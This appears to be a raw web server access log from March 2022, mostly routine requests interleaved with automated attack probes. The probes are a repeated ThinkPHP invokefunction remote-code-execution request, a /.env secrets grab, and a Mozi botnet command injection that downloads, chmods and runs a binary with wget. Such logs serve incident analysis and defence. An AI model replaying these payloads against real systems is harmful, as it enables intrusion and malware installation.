188.119.51.126 - - [02/Mar/2022:00:34:01 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.146.165.37 - - [02/Mar/2022:00:37:29 +0100] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
89.34.27.87 - - [02/Mar/2022:00:37:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
20.127.123.214 - - [02/Mar/2022:00:40:40 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
128.1.248.26 - - [02/Mar/2022:00:42:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
89.34.27.87 - - [02/Mar/2022:00:47:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
128.14.133.58 - - [02/Mar/2022:00:54:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.137 - - [02/Mar/2022:00:55:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
190.180.154.46 - - [02/Mar/2022:00:56:36 +0100] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 329 "-" "-"
118.193.32.180 - - [02/Mar/2022:00:57:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
118.193.32.180 - - [02/Mar/2022:00:57:09 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
45.146.165.37 - - [02/Mar/2022:01:01:18 +0100] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [02/Mar/2022:01:01:19 +0100] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
